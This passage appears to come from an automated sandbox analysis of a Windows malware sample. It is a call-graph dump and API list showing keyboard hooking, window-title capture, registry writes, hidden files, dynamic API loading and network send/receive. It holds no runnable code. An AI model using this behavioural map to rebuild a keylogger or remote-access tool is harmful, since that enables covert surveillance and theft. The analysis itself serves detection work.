calls 48019->48028 48020 441ed1 20 API calls 48020->48028 48021 413733 3 API calls 48021->48028 48022 4135e1 31 API calls 48022->48028 48023 40417e 28 API calls 48023->48028 48027 41bc1f 28 API calls 48027->48028 48028->47980 48028->47983 48028->47987 48028->47989 48028->47990 48028->47993 48028->47997 48028->47998 48028->48000 48028->48006 48028->48009 48028->48015 48028->48016 48028->48019 48028->48020 48028->48021 48028->48022 48028->48023 48028->48027 48029 401e65 22 API calls 48028->48029 48628 414f24 48028->48628 48633 40482d 48028->48633 48640 404f51 48028->48640 48655 4048c8 connect 48028->48655 48715 41b871 48028->48715 48718 4145f8 48028->48718 48721 40ddc4 48028->48721 48727 41bcd3 48028->48727 48730 41bdaf 48028->48730 48030 415474 GetTickCount 48029->48030 48031 41bc1f 28 API calls 48030->48031 48037 415491 48031->48037 48033 41bc1f 28 API calls 48033->48037 48035 41bdaf 28 API calls 48035->48037 48037->48033 48037->48035 48039 402ea1 28 API calls 48037->48039 48040 402f10 28 API calls 48037->48040 48041 406383 28 API calls 48037->48041 48043 401fd8 11 API calls 48037->48043 48044 401f09 11 API calls 48037->48044 48734 41bb77 GetLastInputInfo GetTickCount 48037->48734 48735 41bb27 48037->48735 48740 40f90c GetLocaleInfoA 48037->48740 48743 402f31 28 API calls 48037->48743 48744 404c10 48037->48744 48766 404aa1 61 API calls ctype 48037->48766 48039->48037 48040->48037 48041->48037 48043->48037 48044->48037 48047->48006 48923 41ada8 106 API calls 48047->48923 48048->48006 48049->48006 48050->47461 48051->47469 48052->47473 48055 4020df 11 API calls 48054->48055 48056 406c65 48055->48056 48057 4032a0 28 API calls 48056->48057 48058 406c82 48057->48058 48058->47494 48060 40ebdf 48059->48060 48061 4135ae RegQueryValueExA RegCloseKey 48059->48061 48060->47491 48060->47509 48061->48060 48062->47499 48063->47528 48064->47519 48065->47511 48066->47527 48068 401f86 11 API calls 48067->48068 48069 40da8b 48068->48069 48070 40dae0 48069->48070 48071 40daab 48069->48071 48072 40daa1 48069->48072 48075 41c048 2 API calls 48070->48075 48924 41b645 29 API calls 48071->48924 48074 40dbd4 GetLongPathNameW 48072->48074 48078 40417e 28 API calls 48074->48078 48076 40dae5 48075->48076 48079 40dae9 48076->48079 48080 40db3b 48076->48080 48077 40dab4 48081 401f13 28 API calls 48077->48081 48082 40dbe9 48078->48082 48084 40417e 28 API calls 48079->48084 48083 40417e 28 API calls 48080->48083 48085 40dabe 48081->48085 48086 40417e 28 API calls 48082->48086 48088 40db49 48083->48088 48089 40daf7 48084->48089 48091 401f09 11 API calls 48085->48091 48087 40dbf8 48086->48087 48927 40de0c 28 API calls 48087->48927 48094 40417e 28 API calls 48088->48094 48095 40417e 28 API calls 48089->48095 48091->48072 48092 40dc0b 48928 402fa5 28 API calls 48092->48928 48097 40db5f 48094->48097 48098 40db0d 48095->48098 48096 40dc16 48929 402fa5 28 API calls 48096->48929 48926 402fa5 28 API calls 48097->48926 48925 402fa5 28 API calls 48098->48925 48102 40dc20 48105 401f09 11 API calls 48102->48105 48103 40db6a 48106 401f13 28 API calls 48103->48106 48104 40db18 48107 401f13 28 API calls 48104->48107 48108 40dc2a 48105->48108 48109 40db75 48106->48109 48110 40db23 48107->48110 48111 401f09 11 API calls 48108->48111 48112 401f09 11 API calls 48109->48112 48113 401f09 11 API calls 48110->48113 48114 40dc33 48111->48114 48115 40db7e 48112->48115 48116 40db2c 48113->48116 48117 401f09 11 API calls 48114->48117 48118 401f09 11 API calls 48115->48118 48119 401f09 11 API calls 48116->48119 48120 40dc3c 48117->48120 48118->48085 48119->48085 48121 401f09 11 API calls 48120->48121 48122 40dc45 48121->48122 48123 401f09 11 API calls 48122->48123 48124 40dc4e 48123->48124 48124->47585 48125->47596 48126->47619 48128 413759 RegQueryValueExA RegCloseKey 48127->48128 48129 41377d 48127->48129 48128->48129 48129->47578 48130->47611 48131->47647 48132->47657 48133->47680 48134->47668 48136->47713 48137->47518 48140 41b556 LoadResource LockResource SizeofResource 48139->48140 48141 40f419 48139->48141 48140->48141 48141->47747 48143 4020b7 28 API calls 48142->48143 48144 406e27 48143->48144 48144->47758 48150 40423a 48145->48150 48148->47780 48149->47761 48151 404243 48150->48151 48152 4023ce 11 API calls 48151->48152 48153 40424e 48152->48153 48154 402569 28 API calls 48153->48154 48155 4041b5 48154->48155 48155->47780 48156->47784 48159 4032aa 48158->48159 48161 4032c9 48159->48161 48162 4028e8 28 API calls 48159->48162 48161->47794 48162->48161 48164 4051fb 48163->48164 48173 405274 48164->48173 48166 405208 48166->47797 48168 402061 48167->48168 48169 4023ce 11 API calls 48168->48169 48170 40207b 48169->48170 48197 40267a 48170->48197 48174 405282 48173->48174 48175 405288 48174->48175 48176 40529e 48174->48176 48184 4025f0 48175->48184 48178 4052f5 48176->48178 48179 4052b6 48176->48179 48194 4028a4 22 API calls 48178->48194 48183 40529c 48179->48183 48193 4028e8 28 API calls 48179->48193 48183->48166 48185 402888 22 API calls 48184->48185 48186 402602 48185->48186 48187 402672 48186->48187 48188 402629 48186->48188 48196 4028a4 22 API calls 48187->48196 48192 40263b 48188->48192 48195 4028e8 28 API calls 48188->48195 48192->48183 48193->48183 48195->48192 48198 40268b 48197->48198 48199 4023ce 11 API calls 48198->48199 48200 40208d 48199->48200 48200->47800 48201->47808 48202->47810 48205 41b362 48204->48205 48206 41c055 GetCurrentProcess IsWow64Process 48204->48206 48208 4135e1 RegOpenKeyExA 48205->48208 48206->48205 48207 41c06c 48206->48207 48207->48205 48209 41360f RegQueryValueExA RegCloseKey 48208->48209 48210 413639 48208->48210 48209->48210 48211 402093 28 API calls 48210->48211 48212 41364e 48211->48212 48212->47821 48213->47829 48215 40b947 48214->48215 48220 402252 48215->48220 48217 40b952 48224 40b967 48217->48224 48219 40b961 48219->47840 48221 4022ac 48220->48221 48222 40225c 48220->48222 48221->48217 48222->48221 48231 402779 11 API calls std::_Deallocate 48222->48231 48225 40b9a1 48224->48225 48226 40b973 48224->48226 48243 4028a4 22 API calls 48225->48243 48232 4027e6 48226->48232 48230 40b97d 48230->48219 48231->48221 48233 4027ef 48232->48233 48234 402851 48233->48234 48235 4027f9 48233->48235 48245 4028a4 22 API calls 48234->48245 48238 402802 48235->48238 48240 402815 48235->48240 48244 402aea 28 API calls __EH_prolog 48238->48244 48241 402813 48240->48241 48242 402252 11 API calls 48240->48242 48241->48230 48242->48241 48244->48241 48246->47849 48248 402347 48247->48248 48249 402252 11 API calls 48248->48249 48250 4023c7 48249->48250 48250->47849 48252 4024f9 48251->48252 48253 40250a 28 API calls 48252->48253 48254 4020b1 48253->48254 48254->47590 48271 43ba8a 48255->48271 48257 43aed0 48277 43a837 36 API calls 3 library calls 48257->48277 48259 43ae95 48259->48257 48260 43aeaa 48259->48260 48262 43aeaf __cftof 48259->48262 48276 44062d 20 API calls _Atexit 48260->48276 48262->47878 48264 43aedc 48266 43af0b 48264->48266 48278 43bacf 40 API calls __Tolower 48264->48278 48268 43af77 48266->48268 48279 43ba36 20 API calls 2 library calls 48266->48279 48280 43ba36 20 API calls 2 library calls 48268->48280 48269 43b03e _strftime 48269->48262 48281 44062d 20 API calls _Atexit 48269->48281 48272 43baa2 48271->48272 48273 43ba8f 48271->48273 48272->48259 48282 44062d 20 API calls _Atexit 48273->48282 48275 43ba94 __cftof 48275->48259 48276->48262 48277->48264 48278->48264 48279->48268 48280->48269 48281->48262 48282->48275 48289 401fb0 48283->48289 48285 402f1e 48286 402055 11 API calls 48285->48286 48287 402f2d 48286->48287 48287->47892 48288->47895 48290 4025f0 28 API calls 48289->48290 48291 401fbd 48290->48291 48291->48285 48293 40a162 48292->48293 48294 413584 3 API calls 48293->48294 48295 40a169 48294->48295 48296 40a197 48295->48296 48297 40a17d 48295->48297 48313 409097 48296->48313 48299 40a182 48297->48299 48300 409ed6 48297->48300 48302 409097 28 API calls 48299->48302 48300->47642 48304 40a190 48302->48304 48341 40a268 29 API calls 48304->48341 48306 40a195 48306->48300 48307->47920 48489 403222 48308->48489 48310 403022 48493 403262 48310->48493 48314 4090ad 48313->48314 48315 402252 11 API calls 48314->48315 48316 4090c7 48315->48316 48342 404267 48316->48342 48318 4090d5 48319 40a1b4 48318->48319 48354 40b927 48319->48354 48322 40a205 48325 402093 28 API calls 48322->48325 48323 40a1dd 48324 402093 28 API calls 48323->48324 48326 40a1e7 48324->48326 48327 40a210 48325->48327 48328 41bcef 28 API calls 48326->48328 48329 402093 28 API calls 48327->48329 48330 40a1f5 48328->48330 48331 40a21f 48329->48331 48358 40b19f 31 API calls new 48330->48358 48333 41b580 80 API calls 48331->48333 48335 40a224 CreateThread 48333->48335 48334 40a1fc 48336 401fd8 11 API calls 48334->48336 48337 40a24b CreateThread 48335->48337 48338 40a23f CreateThread 48335->48338 48360 40a2b8 48335->48360 48336->48322 48339 401f09 11 API calls 48337->48339 48366 40a2c4 48337->48366 48338->48337 48363 40a2a2 48338->48363 48340 40a25f 48339->48340 48340->48300 48341->48306 48488 40a2ae 164 API calls 48341->48488 48343 402888 22 API calls 48342->48343 48344 40427b 48343->48344 48345 404290 48344->48345 48346 4042a5 48344->48346 48352 4042df 22 API calls 48345->48352 48348 4027e6 28 API calls 48346->48348 48351 4042a3 48348->48351 48349 404299 48353 402c48 22 API calls 48349->48353 48351->48318 48352->48349 48353->48351 48355 40b930 48354->48355 48356 40a1d2 48354->48356 48359 40b9a7 28 API calls 48355->48359 48356->48322 48356->48323 48358->48334 48359->48356 48369 40a761 48360->48369 48416 40a2f3 48363->48416 48446 40ad11 48366->48446 48370 40a776 Sleep 48369->48370 48390 40a6b0 48370->48390 48372 40a2c1 48373 40a7b6 CreateDirectoryW 48378 40a788 48373->48378 48374 40a7c7 GetFileAttributesW 48374->48378 48375 40a7de SetFileAttributesW 48375->48378 48376 4020df 11 API calls 48388 40a829 48376->48388 48378->48370 48378->48372 48378->48373 48378->48374 48378->48375 48380 401e65 22 API calls 48378->48380 48378->48388 48403 41c482 48378->48403 48379 40a858 PathFileExistsW 48379->48388 48380->48378 48382 4020b7 28 API calls 48382->48388 48383 40a961 SetFileAttributesW 48383->48378 48384 401fe2 28 API calls 48384->48388 48385 406e13 28 API calls 48385->48388 48386 401fd8 11 API calls 48386->48388 48388->48376 48388->48379 48388->48382 48388->48383 48388->48384 48388->48385 48388->48386 48389 401fd8 11 API calls 48388->48389 48413 41c516 32 API calls 48388->48413 48414 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48388->48414 48389->48378 48391 40a75d 48390->48391 48394 40a6c6 48390->48394 48391->48378 48392 40a6e5 CreateFileW 48393 40a6f3 GetFileSize 48392->48393 48392->48394 48393->48394 48395 40a728 CloseHandle 48393->48395 48394->48392 48394->48395 48396 40a73a 48394->48396 48397 40a716 48394->48397 48398 40a71d Sleep 48394->48398 48395->48394 48396->48391 48400 409097 28 API calls 48396->48400 48415 40b117 84 API calls 48397->48415 48398->48395 48401 40a756 48400->48401 48402 40a1b4 125 API calls 48401->48402 48402->48391 48404 41c495 CreateFileW 48403->48404 48406 41c4d2 48404->48406 48407 41c4ce 48404->48407 48408 41c4f2 WriteFile 48406->48408 48409 41c4d9 SetFilePointer 48406->48409 48407->48378 48411 41c505 48408->48411 48412 41c507 CloseHandle 48408->48412 48409->48408 48410 41c4e9 CloseHandle 48409->48410 48410->48407 48411->48412 48412->48407 48413->48388 48414->48388 48415->48398 48417 40a30c GetModuleHandleA SetWindowsHookExA 48416->48417 48418 40a36e GetMessageA 48416->48418 48417->48418 48419 40a328 GetLastError 48417->48419 48420 40a380 TranslateMessage DispatchMessageA 48418->48420 48421 40a2ab 48418->48421 48431 41bc1f 48419->48431 48420->48418 48420->48421 48437 441ed1 48431->48437 48434 402093 28 API calls 48435 40a339 48434->48435 48436 4052fd 28 API calls 48435->48436 48438 441edd 48437->48438 48441 441ccd 48438->48441 48440 41bc43 48440->48434 48442 441ce4 48441->48442 48444 441d1b __cftof 48442->48444 48445 44062d 20 API calls _Atexit 48442->48445 48444->48440 48445->48444 48453 40ad1f 48446->48453 48447 40a2cd 48448 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48450 40b93f 28 API calls 48448->48450 48450->48453 48453->48447 48453->48448 48455 41bb77 GetLastInputInfo GetTickCount 48453->48455 48456 40adbf GetWindowTextW 48453->48456 48458 401f09 11 API calls 48453->48458 48459 40af17 48453->48459 48460 40b927 28 API calls 48453->48460 48462 40ae84 Sleep 48453->48462 48463 441ed1 20 API calls 48453->48463 48465 402093 28 API calls 48453->48465 48469 403014 28 API calls 48453->48469 48470 406383 28 API calls 48453->48470 48472 40ae0c 48453->48472 48473 40a671 12 API calls 48453->48473 48474 41bcef 28 API calls 48453->48474 48475 401fd8 11 API calls 48453->48475 48476 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48453->48476 48477 401f86 48453->48477 48481 434801 23 API calls __onexit 48453->48481 48482 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48453->48482 48483 40907f 28 API calls 48453->48483 48485 40b9b7 28 API calls 48453->48485 48486 40b783 40 API calls 2 library calls 48453->48486 48487 4052fd 28 API calls 48453->48487 48455->48453 48456->48453 48458->48453 48461 401f09 11 API calls 48459->48461 48460->48453 48461->48447 48462->48453 48463->48453 48465->48453 48468 409097 28 API calls 48468->48472 48469->48453 48470->48453 48472->48453 48472->48468 48484 40b19f 31 API calls new 48472->48484 48473->48453 48474->48453 48475->48453 48478 401f8e 48477->48478 48479 402252 11 API calls 48478->48479 48480 401f99 48479->48480 48480->48453 48481->48453 48482->48453 48483->48453 48484->48472 48485->48453 48486->48453 48490 40322e 48489->48490 48499 403618 48490->48499 48492 40323b 48492->48310 48494 40326e 48493->48494 48495 402252 11 API calls 48494->48495 48496 403288 48495->48496 48497 402336 11 API calls 48496->48497 48498 403031 48497->48498 48498->47925 48500 403626 48499->48500 48501 403644 48500->48501 48502 40362c 48500->48502 48504 40365c 48501->48504 48505 40369e 48501->48505 48510 4036a6 28 API calls 48502->48510 48506 403642 48504->48506 48509 4027e6 28 API calls 48504->48509 48511 4028a4 22 API calls 48505->48511 48506->48492 48509->48506 48510->48506 48513 404186 48512->48513 48514 402252 11 API calls 48513->48514 48515 404191 48514->48515 48523 4041bc 48515->48523 48518 4042fc 48534 404353 48518->48534 48520 40430a 48521 403262 11 API calls 48520->48521 48522 404319 48521->48522 48522->47933 48524 4041c8 48523->48524 48527 4041d9 48524->48527 48526 40419c 48526->48518 48528 4041e9 48527->48528 48529 404206 48528->48529 48530 4041ef 48528->48530 48531 4027e6 28 API calls 48529->48531 48532 404267 28 API calls 48530->48532 48533 404204 48531->48533 48532->48533 48533->48526 48535 40435f 48534->48535 48538 404371 48535->48538 48537 40436d 48537->48520 48539 40437f 48538->48539 48540 404385 48539->48540 48541 40439e 48539->48541 48604 4034e6 28 API calls 48540->48604 48542 402888 22 API calls 48541->48542 48543 4043a6 48542->48543 48545 404419 48543->48545 48546 4043bf 48543->48546 48605 4028a4 22 API calls 48545->48605 48548 4027e6 28 API calls 48546->48548 48557 40439c 48546->48557 48548->48557 48557->48537 48604->48557 48612 43ab1a 48606->48612 48610 4138ca RegSetValueExA RegCloseKey 48609->48610 48611 4138f4 48609->48611 48610->48611 48611->47952 48615 43aa9b 48612->48615 48614 40170d 48614->47950 48616 43aaaa 48615->48616 48617 43aabe 48615->48617 48621 44062d 20 API calls _Atexit 48616->48621 48620 43aaaf __alldvrm __cftof 48617->48620 48622 4489d7 11 API calls 2 library calls 48617->48622 48620->48614 48621->48620 48622->48620 48626 41b98a ctype ___scrt_get_show_window_mode 48623->48626 48624 402093 28 API calls 48625 414f84 48624->48625 48625->47958 48626->48624 48627->47975 48629 414f33 48628->48629 48630 414f3d getaddrinfo WSASetLastError 48628->48630 48769 414dc1 29 API calls ___std_exception_copy 48629->48769 48630->48028 48632 414f38 48632->48630 48634 404846 socket 48633->48634 48635 404839 48633->48635 48637 404860 CreateEventW 48634->48637 48638 404842 48634->48638 48770 40489e WSAStartup 48635->48770 48637->48028 48638->48028 48639 40483e 48639->48634 48639->48638 48641 404f65 48640->48641 48642 404fea 48640->48642 48643 404f6e 48641->48643 48644 404fc0 CreateEventA CreateThread 48641->48644 48645 404f7d GetLocalTime 48641->48645 48642->48028 48643->48644 48644->48642 48772 405150 48644->48772 48646 41bc1f 28 API calls 48645->48646 48647 404f91 48646->48647 48771 4052fd 28 API calls 48647->48771 48656 404a1b 48655->48656 48657 4048ee 48655->48657 48658 404a21 WSAGetLastError 48656->48658 48659 40497e 48656->48659 48657->48659 48661 40531e 28 API calls 48657->48661 48679 404923 48657->48679 48658->48659 48660 404a31 48658->48660 48659->48028 48662 404a36 48660->48662 48667 404932 48660->48667 48664 40490f 48661->48664 48781 41cb72 30 API calls 48662->48781 48668 402093 28 API calls 48664->48668 48666 40492b 48666->48667 48670 404941 48666->48670 48671 402093 28 API calls 48667->48671 48673 40491e 48668->48673 48669 404a40 48782 4052fd 28 API calls 48669->48782 48681 404950 48670->48681 48682 404987 48670->48682 48672 404a80 48671->48672 48675 402093 28 API calls 48672->48675 48676 41b580 80 API calls 48673->48676 48678 404a8f 48675->48678 48676->48679 48683 41b580 80 API calls 48678->48683 48776 420cf1 27 API calls 48679->48776 48686 402093 28 API calls 48681->48686 48778 421ad1 54 API calls 48682->48778 48683->48659 48689 40495f 48686->48689 48688 40498f 48692 4049c4 48688->48692 48693 404994 48688->48693 48690 402093 28 API calls 48689->48690 48694 40496e 48690->48694 48780 420e97 28 API calls 48692->48780 48697 402093 28 API calls 48693->48697 48698 41b580 80 API calls 48694->48698 48700 4049a3 48697->48700 48701 404973 48698->48701 48699 4049cc 48702 4049f9 CreateEventW CreateEventW 48699->48702 48704 402093 28 API calls 48699->48704 48703 402093 28 API calls 48700->48703 48777 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48701->48777 48702->48659 48705 4049b2 48703->48705 48707 4049e2 48704->48707 48708 41b580 80 API calls 48705->48708 48710 402093 28 API calls 48707->48710 48709 4049b7 48708->48709 48779 421143 52 API calls 48709->48779 48712 4049f1 48710->48712 48713 41b580 80 API calls 48712->48713 48714 4049f6 48713->48714 48714->48702 48783 41b847 GlobalMemoryStatusEx 48715->48783 48717 41b886 48717->48028 48784 4145bb 48718->48784 48722 40dde0 48721->48722 48723 41353a 3 API calls 48722->48723 48724 40dde7 48723->48724 48725 413584 3 API calls 48724->48725 48726 40ddff 48724->48726 48725->48726 48726->48028 48728 4020b7 28 API calls 48727->48728 48729 41bce8 48728->48729 48729->48028 48731 41bdbc 48730->48731 48732 4020b7 28 API calls 48731->48732 48733 41bdce 48732->48733 48733->48028 48734->48037 48736 436f10 ___scrt_get_show_window_mode 48735->48736 48737 41bb46 GetForegroundWindow GetWindowTextW 48736->48737 48738 40417e 28 API calls 48737->48738 48739 41bb70 48738->48739 48739->48037 48741 402093 28 API calls 48740->48741 48742 40f931 48741->48742 48742->48037 48743->48037 48745 4020df 11 API calls 48744->48745 48746 404c27 48745->48746 48747 4020df 11 API calls 48746->48747 48755 404c30 48747->48755 48748 43bda0 new 21 API calls 48748->48755 48750 404c96 48752 404ca1 48750->48752 48750->48755 48751 4020b7 28 API calls 48751->48755 48835 404e26 99 API calls 48752->48835 48753 401fe2 28 API calls 48753->48755 48755->48748 48755->48750 48755->48751 48755->48753 48757 401fd8 11 API calls 48755->48757 48822 404cc3 48755->48822 48834 404b96 57 API calls 48755->48834 48756 404ca8 48758 401fd8 11 API calls 48756->48758 48757->48755 48759 404cb1 48758->48759 48760 401fd8 11 API calls 48759->48760 48761 404cba 48760->48761 48761->48006 48763->48028 48764->48006 48766->48037 48767->48006 48768->48006 48769->48632 48770->48639 48775 40515c 102 API calls 48772->48775 48774 405159 48775->48774 48776->48666 48777->48659 48778->48688 48779->48701 48780->48699 48781->48669 48783->48717 48787 41458e 48784->48787 48788 4145a3 ___scrt_initialize_default_local_stdio_options 48787->48788 48791 43f7ed 48788->48791 48794 43c540 48791->48794 48795 43c580 48794->48795 48796 43c568 48794->48796 48795->48796 48798 43c588 48795->48798 48816 44062d 20 API calls _Atexit 48796->48816 48817 43a837 36 API calls 3 library calls 48798->48817 48800 43c598 48818 43ccc6 20 API calls 2 library calls 48800->48818 48801 43c56d __cftof 48809 43502b 48801->48809 48804 4145b1 48804->48028 48805 43c610 48819 43d334 51 API calls 3 library calls 48805->48819 48808 43c61b 48820 43cd30 20 API calls _free 48808->48820 48810 435036 IsProcessorFeaturePresent 48809->48810 48811 435034 48809->48811 48813 435078 48810->48813 48811->48804 48821 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48813->48821 48815 43515b 48815->48804 48816->48801 48817->48800 48818->48805 48819->48808 48820->48801 48821->48815 48823 4020df 11 API calls 48822->48823 48833 404cde 48823->48833 48824 404e13 48825 401fd8 11 API calls 48824->48825 48826 404e1c 48825->48826 48826->48750 48827 401fe2 28 API calls 48827->48833 48828 401fd8 11 API calls 48828->48833 48829 4020f6 28 API calls 48829->48833 48830 401fc0 28 API calls 48831 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48830->48831 48831->48833 48836 415b25 48831->48836 48832 4041a2 28 API calls 48832->48833 48833->48824 48833->48827 48833->48828 48833->48829 48833->48830 48833->48832 48834->48755 48835->48756 48837 4020f6 28 API calls 48836->48837 48838 415b47 SetEvent 48837->48838 48839 415b5c 48838->48839 48840 4041a2 28 API calls 48839->48840 48841 415b76 48840->48841 48842 4020f6 28 API calls 48841->48842 48843 415b86 48842->48843 48844 4020f6 28 API calls 48843->48844 48845 415b98 48844->48845 48846 41beac 28 API calls 48845->48846 48847 415ba1 48846->48847 48848 4170c4 48847->48848 48849 415bc1 GetTickCount 48847->48849 48850 415d6a 48847->48850 48851 401e8d 11 API calls 48848->48851 48852 41bc1f 28 API calls 48849->48852 48850->48848 48914 415d20 48850->48914 48853 4170cd 48851->48853 48854 415bd2 48852->48854 48856 401fd8 11 API calls 48853->48856 48915 41bb77 GetLastInputInfo GetTickCount 48854->48915 48858 4170d9 48856->48858 48860 401fd8 11 API calls 48858->48860 48859 415bde 48861 41bc1f 28 API calls 48859->48861 48862 4170e5 48860->48862 48863 415be9 48861->48863 48864 41bb27 30 API calls 48863->48864 48865 415bf7 48864->48865 48866 41bdaf 28 API calls 48865->48866 48867 415c05 48866->48867 48868 401e65 22 API calls 48867->48868 48869 415c13 48868->48869 48916 402f31 28 API calls 48869->48916 48871 415c21 48917 402ea1 28 API calls 48871->48917 48873 415c30 48874 402f10 28 API calls 48873->48874 48875 415c3f 48874->48875 48918 402ea1 28 API calls 48875->48918 48877 415c4e 48878 402f10 28 API calls 48877->48878 48879 415c5a 48878->48879 48919 402ea1 28 API calls 48879->48919 48881 415c64 48920 404aa1 61 API calls ctype 48881->48920 48883 415c73 48884 401fd8 11 API calls 48883->48884 48885 415c7c 48884->48885 48886 401fd8 11 API calls 48885->48886 48887 415c88 48886->48887 48888 401fd8 11 API calls 48887->48888 48889 415c94 48888->48889 48890 401fd8 11 API calls 48889->48890 48891 415ca0 48890->48891 48892 401fd8 11 API calls 48891->48892 48893 415cac 48892->48893 48894 401fd8 11 API calls 48893->48894 48895 415cb8 48894->48895 48896 401f09 11 API calls 48895->48896 48897 415cc1 48896->48897 48898 401fd8 11 API calls 48897->48898 48899 415cca 48898->48899 48900 401fd8 11 API calls 48899->48900 48901 415cd3 48900->48901 48902 401e65 22 API calls 48901->48902 48903 415cde 48902->48903 48904 43bb2c _strftime 40 API calls 48903->48904 48905 415ceb 48904->48905 48906 415cf0 48905->48906 48907 415d16 48905->48907 48909 415d09 48906->48909 48910 415cfe 48906->48910 48908 401e65 22 API calls 48907->48908 48908->48914 48911 404f51 105 API calls 48909->48911 48921 404ff4 82 API calls 48910->48921 48913 415d04 48911->48913 48913->48848 48914->48848 48922 4050e4 84 API calls 48914->48922 48915->48859 48916->48871 48917->48873 48918->48877 48919->48881 48920->48883 48921->48913 48922->48913 48924->48077 48925->48104 48926->48103 48927->48092 48928->48096 48929->48102 48932 40f7fd 48930->48932 48931 413584 3 API calls 48931->48932 48932->48931 48933 40f82f 48932->48933 48934 40f8a1 48932->48934 48936 40f891 Sleep 48932->48936 48935 409097 28 API calls 48933->48935 48933->48936 48939 41bcef 28 API calls 48933->48939 48945 401f09 11 API calls 48933->48945 48949 402093 28 API calls 48933->48949 48952 4137aa 14 API calls 48933->48952 48963 40d0d1 112 API calls ___scrt_get_show_window_mode 48933->48963 48964 41384f 14 API calls 48933->48964 48937 409097 28 API calls 48934->48937 48935->48933 48936->48932 48940 40f8ac 48937->48940 48939->48933 48941 41bcef 28 API calls 48940->48941 48942 40f8b8 48941->48942 48965 41384f 14 API calls 48942->48965 48945->48933 48946 40f8cb 48947 401f09 11 API calls 48946->48947 48948 40f8d7 48947->48948 48950 402093 28 API calls 48948->48950 48949->48933 48951 40f8e8 48950->48951 48953 4137aa 14 API calls 48951->48953 48952->48933 48954 40f8fb 48953->48954 48966 41288b TerminateProcess WaitForSingleObject 48954->48966 48956 40f903 ExitProcess 48967 412829 62 API calls 48958->48967 48964->48933 48965->48946 48966->48956 48968 42f97e 48969 42f989 48968->48969 48970 42f99d 48969->48970 48972 432f7f 48969->48972 48973 432f8a 48972->48973 48974 432f8e 48972->48974 48973->48970 48976 440f5d 48974->48976 48977 446206 48976->48977 48978 446213 48977->48978 48979 44621e 48977->48979 48980 4461b8 ___crtLCMapStringA 21 API calls 48978->48980 48981 446226 48979->48981 48987 44622f ___crtLCMapStringA 48979->48987 48986 44621b 48980->48986 48984 446802 _free 20 API calls 48981->48984 48982 446234 48989 44062d 20 API calls _Atexit 48982->48989 48983 446259 RtlReAllocateHeap 48983->48986 48983->48987 48984->48986 48986->48973 48987->48982 48987->48983 48990 443001 7 API calls 2 library calls 48987->48990 48989->48986 48990->48987 48991 426cdc 48996 426d59 send 48991->48996 48997 41e04e 48998 41e063 ctype ___scrt_get_show_window_mode 48997->48998 49000 432f55 21 API calls 48998->49000 49010 41e266 48998->49010 49004 41e213 ___scrt_get_show_window_mode 49000->49004 49001 41e277 49002 41e21a 49001->49002 49003 432f55 21 API calls 49001->49003 49006 41e2b0 ___scrt_get_show_window_mode 49003->49006 49004->49002 49005 432f55 21 API calls 49004->49005 49008 41e240 ___scrt_get_show_window_mode 49005->49008 49006->49002 49012 4335db 49006->49012 49008->49002 49009 432f55 21 API calls 49008->49009 49009->49010 49010->49002 49011 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49010->49011 49011->49001 49015 4334fa 49012->49015 49014 4335e3 49014->49002 49016 433513 49015->49016 49020 433509 49015->49020 49017 432f55 21 API calls 49016->49017 49016->49020 49018 433534 49017->49018 49018->49020 49021 4338c8 CryptAcquireContextA 49018->49021 49020->49014 49022 4338e4 49021->49022 49023 4338e9 CryptGenRandom 49021->49023 49022->49020 49023->49022 49024 4338fe CryptReleaseContext 49023->49024 49024->49022 49025 426c6d 49031 426d42 recv 49025->49031

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
